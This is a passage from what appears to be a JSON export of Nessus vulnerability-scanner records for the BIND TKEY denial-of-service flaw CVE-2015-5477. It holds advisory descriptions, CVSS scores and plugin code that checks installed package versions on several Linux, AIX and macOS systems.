reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbind-dev\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbind9-80\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libdns88\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libisc84\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libisccc80\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libisccfg82\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"liblwres80\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lwresd\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bind9\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bind9-doc\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bind9-host\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bind9utils\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"dnsutils\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"host\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbind-dev\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbind-export-dev\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbind9-90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libdns-export100\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libdns-export100-udeb\", 
reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libdns100\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libirs-export91\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libirs-export91-udeb\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisc-export95\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisc-export95-udeb\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisc95\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisccc90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisccfg-export90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisccfg-export90-udeb\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisccfg90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"liblwres90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lwresd\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:57", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. 
(CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bind on SL5.x i386/x86_64 (20150729)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bind", "p-cpe:/a:fermilab:scientific_linux:bind-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-libbind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-libs", "p-cpe:/a:fermilab:scientific_linux:bind-sdb", "p-cpe:/a:fermilab:scientific_linux:bind-utils", "p-cpe:/a:fermilab:scientific_linux:caching-nameserver", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150729_BIND_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/85120", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85120);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Scientific Linux Security Update : bind on SL5.x i386/x86_64 (20150729)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way BIND handled requests for TKEY DNS\nresource records. 
A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1507&L=scientific-linux-errata&F=&S=&P=13277\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?50e4fb33\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-debuginfo-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:14", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. 
By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-18T00:00:00", "type": "nessus", "title": "AIX 5.3 TL 12 : bind9 (IV75966)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:5.3"], "id": "AIX_IV75966.NASL", "href": "https://www.tenable.com/plugins/nessus/85450", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85450);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 5.3 TL 12 : bind9 (IV75966)\");\n script_summary(english:\"Check for APAR IV75966\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. 
By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"12\", sp:\"09\", patch:\"IV75966s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"5.3.12.0\", maxfilesetver:\"5.3.12.10\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:59", "description": "The remote Mac OS X host has a version of OS X Server installed that is prior to 4.1.5. It is, therefore, affected by a denial of service vulnerability due to an assertion flaw that occurs when handling TKEY queries. A remote attacker can exploit this, via a specially crafted request, to cause a REQUIRE assertion failure and daemon exit, resulting in a denial of service condition.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "Mac OS X : OS X Server < 4.1.5 BIND DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x_server"], "id": "MACOSX_SERVER_4_1_5.NASL", "href": "https://www.tenable.com/plugins/nessus/85410", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85410);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_bugtraq_id(76092);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-08-13-4\");\n\n script_name(english:\"Mac OS X : OS X Server < 4.1.5 BIND DoS\");\n script_summary(english:\"Checks the OS X Server version.\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"The remote host is missing a security update for OS X Server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of OS X Server installed that\nis prior to 4.1.5. It is, therefore, affected by a denial of service\nvulnerability due to an assertion flaw that occurs when handling TKEY\nqueries. A remote attacker can exploit this, via a specially crafted\nrequest, to cause a REQUIRE assertion failure and daemon exit,\nresulting in a denial of service condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205032\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to OS X Server version 4.1.5 or later.\n\nNote that OS X Server 4.1.5 is available only for OS X 10.10.5 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_server_services.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Server/Version\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Server/Version\");\n\nfixed_version = \"4.1.5\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"OS X Server\", version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:37:56", "description": "Versions of ISC BIND 9.x prior to 9.9.7-P2, 9.9.9-S3, 9.10.2-P3, and 9.10.3 are unpatched for a flaw that is triggered when handling TKEY queries. With a specially crafted request, a remote attacker can cause the named service to terminate.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-01-19T00:00:00", "type": "nessus", "title": "ISC BIND 9.x < 9.9.7-P2 / 9.9.8 / 9.9.8-S1 / 9.9.9-S3 / 9.10.2-P3 / 9.10.3 / 9.10.3rc DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*"], "id": "9865.PRM", "href": "https://www.tenable.com/plugins/nnm/9865", "sourceData": "Binary data 9865.prm", "cvss": {"score": 7.8, "vector": "CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:24", "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bind 
(SSA:2015-209-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bind", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-209-01.NASL", "href": "https://www.tenable.com/plugins/nessus/85043", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-209-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85043);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"SSA\", value:\"2015-209-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bind (SSA:2015-209-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bind packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.554472\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb5b6b3c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ 
\"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bind\", pkgver:\"9.10.2_P3\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.10.2_P3\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": 
"2022-03-27T15:04:56", "description": "From Red Hat Security Advisory 2015:1513 :\n\nUpdated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : bind (ELSA-2015-1513)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bind", "p-cpe:/a:oracle:linux:bind-chroot", "p-cpe:/a:oracle:linux:bind-devel", "p-cpe:/a:oracle:linux:bind-libs", "p-cpe:/a:oracle:linux:bind-libs-lite", "p-cpe:/a:oracle:linux:bind-license", "p-cpe:/a:oracle:linux:bind-lite-devel", "p-cpe:/a:oracle:linux:bind-sdb", "p-cpe:/a:oracle:linux:bind-sdb-chroot", "p-cpe:/a:oracle:linux:bind-utils", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/85067", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in 